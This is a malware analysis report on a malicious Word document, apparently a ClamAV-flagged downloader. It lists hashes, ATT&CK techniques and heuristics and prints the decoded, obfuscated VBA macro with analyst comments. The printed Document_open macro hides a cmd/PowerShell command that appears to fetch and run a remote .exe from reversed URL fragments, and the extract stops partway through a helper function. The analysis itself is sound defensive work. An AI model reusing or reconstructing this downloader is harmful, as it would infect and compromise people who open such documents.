Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 30e3ac01583aefdc…

MALICIOUS

Office (OLE)

72.5 KB Created: 2018-09-07 07:47:00 Authoring application: Microsoft Office Word First seen: 2018-10-13
MD5: 27738ce09fb3733ed5ca3776578399f5 SHA-1: a9e94b135cf4382c243fdd878ad509b174a3223f SHA-256: 30e3ac01583aefdc2d0e5f216e91609a33c2e0fb4dd9a65f5f3d0b70b12bcd81
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call within the Document_Open subroutine to execute a command. This command is constructed by concatenating several obfuscated strings, likely to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6680504-0' further supports the downloader functionality.

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-6680504-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6680504-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6102 bytes
SHA-256: 475934794e74d398ea574ec9b06082ee4b28488ddbb102e9adff9742c92b6629
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XsYDGDIwzicLo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as it appears in the decoded VBA source (macros.bas above).
' VB_Base = "1Normal.ThisDocument" together with VB_PredeclaredId = True is
' consistent with this being the document's own class module, which is where
' the Document_open auto-run handler below lives. The random-looking VB_Name
' matches the obfuscated identifiers used throughout the macro.
Private Sub Document_open()
' Auto-run entry point: Word invokes Document_Open when the file is opened
' (the OLE_VBA_DOCOPEN finding above). The "On Error Resume Next" that follows
' is split across four lines with line-continuation characters, likely to
' defeat naive pattern matching; it suppresses every runtime error so neither
' the filler statements nor the Shell call can abort the macro.
On _
Error _
Resume _
Next
' "Month Format(...)" evaluates a constant string and discards the result; a
' non-date string should raise a type mismatch that the error handler above
' swallows. These lines appear to be filler around the single real action.
   Month Format("zFwUSkZ" + "Owl" + "nk" + "118846365")
   Month Format("vR" + "jPL" + "152252932" + "3909")
   Month Format("ZXnjcUbLquHN" + "8501" + "7907" + "220975800")
' The only effective statement. The command string is the concatenation of
' seven helper values; AUlKUW and hEGTOYnCm are defined in the next module,
' the Format(...) operands are not present in this extract. Shell's second
' argument is the window style: Format(vbHide) evaluates to "0", so the child
' process starts with a hidden window (the OLE_VBA_SHELL finding).
Shell Format(NrQjDdP) + Format(iEzOmmvUjXqbRZ) + Format(oRIUQobufUHDak) + AUlKUW + hEGTOYnCm + Format(pcDiRirtwBA) + Format(lFXTpwiWhOfaZp), Format(vbHide)
   Month Format("vWLa" + "IN" + "IspTCaq" + "245912721")
   Month Format("DYlJ" + "wALLOD" + "5179" + "j")
   Month Format("8413" + "VKiU")
End Sub



Attribute VB_Name = "CnBwhfPfWWCR"
' Second module in the extract. It holds AUlKUW and hEGTOYnCm, two of the
' helpers whose return values Document_open concatenates into the Shell
' command.
Function AUlKUW()
' Returns one segment of the command string that Document_open passes to
' Shell. Only the eleven string assignments (utmoBvzzjOR ... jKAibOlcwW) and
' the final concatenation matter; every "Month Format(...)" line discards its
' result and relies on the error handler below to swallow the type mismatch.

On _
Error _
Resume _
Next
Month Format("8584" + "d")
' Chr() of a spelled-out constant sum hides a single character code
' (7+2+14+13+63 = 99, 4+1+10+9+43 = 67, 2+0+4+4+24 = 34, 0+8+11+5+75 = 99).
' Together with the literal "md /V" that follows, this segment appears to
' open a cmd.exe /V (delayed-expansion) invocation; the many "^" characters
' are consistent with cmd escape characters, so the raw source never shows the
' effective command and plain string matching on it is unreliable.
utmoBvzzjOR = Chr(7 + 2 + 14 + 13 + 63) + "md /V" + "^:/" + Chr(4 + 1 + 10 + 9 + 43) + Chr(2 + 0 + 4 + 4 + 24) + "^s^" + "et ^" + "H^Z=^ " + "^" + " ^ " + "  ^ ^ " + " ^ ^   " + " " + "^   ^ " + "}^}{^" + "h" + Chr(7 + 2 + 14 + 13 + 63) + "t^a" + Chr(7 + 2 + 14 + 13 + 63) + "}"
Month Format("348262671" + "jRUZVTaK")
   Month Format("np" + "293208402")
pzNDGQES = "^" + ";k" + "^a^e" + "rb;vX^" + "d$ ^m^e" + "^t^I" + "-^e^kov" + "n^I" + "^;)v^X" + "d" + "$^" + " ,^BK^m" + "$(e"
Month Format("317102334" + "233382953" + "QkK" + "vl")
   Month Format("9239" + "2493")
   Month Format("107656055" + "318852053")
LszIvVOVzFt = "li^Fd" + "^" + "a^o" + "lnw" + "^oD." + "^t^DN"
Month Format("PTcjZNV" + "441988882")
   Month Format("vAER" + "izrKDnp")
   Month Format("kmSu" + "245589811")
PvQjMzBhOUX = "^$^{yr" + "^" + "t{)^f" + "vR$^ n^" + "i BK"
Month Format("146981492" + "XYsKJhEY")
   Month Format("2606" + "fzuGXaF" + "rIpIRR" + "owqZ")
   Month Format("2882" + "rBH")
bsblwsqDBq = "^m^" + "$(h" + Chr(0 + 8 + 11 + 5 + 75) + "a" + "^e" + "r^of;^'" + "ex^e^." + "'^+s^P"
Month Format("ZrZNqIwipkQk" + "ICaHwAWMaCKR" + "qaKcfSz" + "404")
   Month Format("KWKj" + "CLiH" + "K" + "kOfsTI")
   Month Format("mIvChmjwHEstKt" + "UPnp")
dnRwr = "j" + "^$^" + "+^'" + "\^'+" + Chr(0 + 8 + 11 + 5 + 75) + "^i" + "^l^bup^" + ":vne^$=" + "v" + "Xd" + "^$;'" + "2" + "^71' ^="
Month Format("3198" + "8979" + "458" + "FRH")
   Month Format("Vpri" + "137747448")
   Month Format("RT" + "JTl" + "tHooScz" + "PwSRVTMFzki")
Unjvsviidl = " ^sPj^" + "$^;)^'^" + "@^" + "'(^t" + "i^lp^" + "S^." + "'^m" + "/^m" + "^o" + Chr(0 + 8 + 11 + 5 + 75) + "^.zen" + "^e^m" + "^"
Month Format("9269" + "NO")
   Month Format("IjiH" + "257585412" + "4383" + "F")
   Month Format("Vqihf" + "dF")
' The fragments from here on contain pieces such as "op//^:p" + "^t^" + "t^"
' + "h" and "^:^ptt^" + "h@": read backwards with the carets removed they
' resemble URL fragments, consistent with one or more URLs being assembled
' only at runtime. This is why the EMBEDDED_URL heuristic above surfaces only
' the harmless schema URL from the document body and not these.
uGiHIfGM = "i^j^l^" + "op//^:p" + "^t^" + "t^" + "h" + "^@5" + "m^" + "k/" + "s" + "^edu^" + "l" + Chr(0 + 8 + 11 + 5 + 75) + "n^i/n"
Month Format("327168048" + "ncfJL")
   Month Format("iYlp" + "o")
   Month Format("2689" + "SjkqFh" + "NLjDrOTCCiH" + "YiJWrDUEi")
TuYtwYfTZzG = "^" + "imda^-" + "pw/m" + "o" + Chr(0 + 8 + 11 + 5 + 75) + "^." + "re^ma" + "^" + "g^i" + "t^" + "l^u^.ww" + "^w//" + "^:^ptt^" + "h@"
Month Format("YXELBiz" + "zK" + "iGuoRz" + "506972982")
   Month Format("tnk" + "FvutaM")
DwLZYFwFfi = "R^s^k" + "YT^0/m" + "^o" + Chr(0 + 8 + 11 + 5 + 75) + ".r^e" + "tt^ert" + "r^"
Month Format("3678" + "8189")
   Month Format("U" + "uLMzaBUA" + "PjsLkzmwsFJHcv" + "UIAzWoZrsJ")
   Month Format("I" + "134133582")
   Month Format("LCs" + "8711" + "j" + "uzPGpXB")
   Month Format("bTX" + "otp" + "61206136" + "5195")
   Month Format("8326" + "jKt")
jKAibOlcwW = "et^ep/" + "/^:^" + "p^t" + "^t" + "^h@X^" + "W^" + "I^A^7" + "l^Z/ofn" + "^i^.n" + "er^t^l"
' The return value is the fixed-order concatenation of the eleven fragments;
' Document_open appends it between the other helper results before Shell.
AUlKUW = utmoBvzzjOR + pzNDGQES + LszIvVOVzFt + PvQjMzBhOUX + bsblwsqDBq + dnRwr + Unjvsviidl + uGiHIfGM + TuYtwYfTZzG + DwLZYFwFfi + jKAibOlcwW
   Month Format("RBViK" + "sACVRKiG")
   Month Format("RP" + "77994611")
   Month Format("QlA" + "AlXKGDV" + "1399" + "kCCw")
End Function
Function hEGTOYnCm()

On _
Error _
Resume _
Next
Month Format("W" + "
... (truncated)